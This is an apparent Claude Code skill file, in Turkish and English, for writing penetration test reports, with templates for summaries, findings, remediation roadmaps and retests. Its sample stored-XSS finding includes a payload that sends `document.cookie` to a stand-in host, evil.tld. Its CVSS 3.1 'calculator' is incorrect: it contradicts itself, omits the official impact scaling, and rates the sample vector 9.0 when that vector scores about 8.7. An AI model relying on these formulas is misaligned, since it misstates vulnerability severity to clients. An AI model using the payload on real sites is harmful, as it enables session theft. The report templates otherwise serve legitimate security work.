---
name: pentest-report
description: Penetration test rapor yazimi — executive summary, technical writeup, CVSS scoring, remediation roadmap advisory. Triggers on pentest report, executive summary, technical writeup, CVSS, remediation roadmap, finding writeup, retest report.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents report-generator
---

# pentest-report

Pentest rapor yazimi. Engagement sonrasi final deliverable.

## Triggers

- "pentest rapor yaz"
- "executive summary"
- "technical writeup"
- "CVSS score hesapla"
- "remediation roadmap"
- "retest rapor"

## Rapor Yapisi

```
1. Cover Page
2. Executive Summary (1-2 sayfa, non-technical)
3. Scope + Methodology (1 sayfa)
4. Risk Matrix + Summary Findings Table
5. Detailed Findings (her bulgu icin 1-2 sayfa)
6. Remediation Roadmap
7. Appendix (tool list, sample evidence, retest plan)
```

## Executive Summary Sablonu

```markdown
# Executive Summary

[Sirket Adi] tarafindan yetkilendirilen <pentest tipi> testi, [tarih araligi]
boyunca [pentest firma adi] tarafindan yurutuldu. Test scope'unda <X> asset
incelendi: [kisa scope ozeti].

## Anahtar Bulgular

Toplam <N> bulgu tespit edildi:
- **<X> Critical** — derhal mudahale gerekli
- **<X> High** — 30 gun icinde duzeltilmeli
- **<X> Medium** — 90 gun
- **<X> Low** — best effort

En ciddi bulgu: <bulgu kisa aciklamasi>. Bu zafiyet [is etkisi: musteri verisi
ifsasi / mali kayip / regulasyon ihlali] riskine yol acmaktadir.

## Genel Guvenlik Olcumu

[Sirket Adi]'in genel guvenlik olgunluk seviyesi <Initial/Repeatable/Defined/
Managed/Optimizing> olarak degerlendirildi. Onceki year baseline ile
karsilastirma: <improving / stable / degraded>.

## Stratejik Onerisi

1. <Kritik bulgu icin remediation>
2. <Surec / kultur onerisi: incident response drill, awareness training>
3. <Yatirim onerisi: SIEM coverage, MFA universal>

## Acceptance

Bu rapor [tarih] itibariyle teslim edildi. Bulgular [tarih + 7 gun]'de retest
icin aciliyor.
```

## Bulgu Sablonu

```markdown
## [BLG-001] Stored XSS in Comment Field — CRITICAL

### CVSS 3.1
**9.0 (Critical)** — `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N`

### Etki
Authenticated low-priv user can inject persistent JavaScript that executes
in admin browsers, leading to:
- Full admin session hijack
- Persistent malicious payload (kalici DB kaydi)
- 1-click via existing workflow (admin moderator panel)

### Test Asamalari
1. Login: user@test.local / Test123! (low priv)
2. Navigate: /comments
3. Submit: `<img src=x onerror="fetch('https://evil.tld/?c='+document.cookie)">`
4. Wait: admin moderator review panel'i actiginda payload tetiklenir
5. Confirm: cookie attacker server'a teslim edilir

### Kanit
- `evidence/blg-001-payload.png` (HAR file ek)
- `evidence/blg-001-cookie-exfil.png`
- `evidence/blg-001-admin-impact.mp4` (60sn video)

### Etkilenen Bilesen
- File: `src/components/Comment.tsx:42`
- Component: CommentRenderer.render
- Endpoint: POST /api/comments

### Kok Sebep
Server-side comment body sanitization eksik. Frontend `dangerouslySetInnerHTML`
ile direct render.

### Onerilen Cozum

**Quick fix (1 gun)**: Server-side sanitization
```javascript
// src/api/comments.js
import DOMPurify from 'isomorphic-dompurify';
const cleanBody = DOMPurify.sanitize(req.body.body, { ALLOWED_TAGS: ['b','i','em'] });
```

**Long-term (1 hafta)**:
- Content Security Policy header: `default-src 'self'; script-src 'self' 'nonce-{random}'`
- Cookie flag: HttpOnly + Secure + SameSite=Strict
- Code review checklist: dangerouslySetInnerHTML kullanim onayi

### Doğrulama
Retest sirasinda ayni payload submit -> sanitize edilmeli, exec edilmemeli.

### CWE / MITRE
- CWE-79: Improper Neutralization of Input (Cross-Site Scripting)
- MITRE: T1059.007 (Command and Scripting Interpreter: JavaScript)

### Baglanti
- OWASP XSS Prevention Cheatsheet
- [HackerOne similar finding](...)
```

## CVSS 3.1 Calculator (Hizli)

```
Base Score = Impact * Exploitability

Impact = 1 - ((1-C) * (1-I) * (1-A))
  C, I, A: None=0, Low=0.22, High=0.56

Exploitability = 8.22 * AV * AC * PR * UI
  AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2
  AC: Low=0.77, High=0.44
  PR: None=0.85, Low=0.62, High=0.27 (Scope U)
      None=0.85, Low=0.68, High=0.50 (Scope C)
  UI: None=0.85, Required=0.62

If Scope Unchanged:
  if Impact <= 0: BaseScore = 0
  else: BaseScore = roundup(min(Impact + Exploitability, 10))

If Scope Changed:
  BaseScore = roundup(min(1.08 * (Impact + Exploitability), 10))
```

Online: https://www.first.org/cvss/calculator/3.1

## Remediation Roadmap

```markdown
| Onceelik | Bulgu | Effort | Owner | Due | Status |
|----------|-------|--------|-------|-----|--------|
| P0 | BLG-001 Stored XSS | 8h | Frontend | 2026-05-22 | In progress |
| P0 | BLG-002 SQL Injection | 12h | Backend | 2026-05-22 | Open |
| P1 | BLG-003 Weak Cipher | 4h | DevOps | 2026-06-15 | Open |
| P2 | BLG-004 Missing HSTS | 2h | DevOps | 2026-07-30 | Open |
| P3 | BLG-005 Verbose Error | 1h | Backend | Best effort | Open |
```

## Retest Plani

- Time window: 30 gun icinde
- Scope: sadece original engagement'tan tespit edilen bulgular
- Method: PoC reproduce + remediation verification
- Output: Per-finding "Resolved" / "Open" / "Mitigated" + delta rapor

## Out-of-Scope

- Rapor pdf rendering (Latex, Word) — sablon hazir, format musteri tarafi
- Otomatik finding write (sablon var, icerik manuel insan)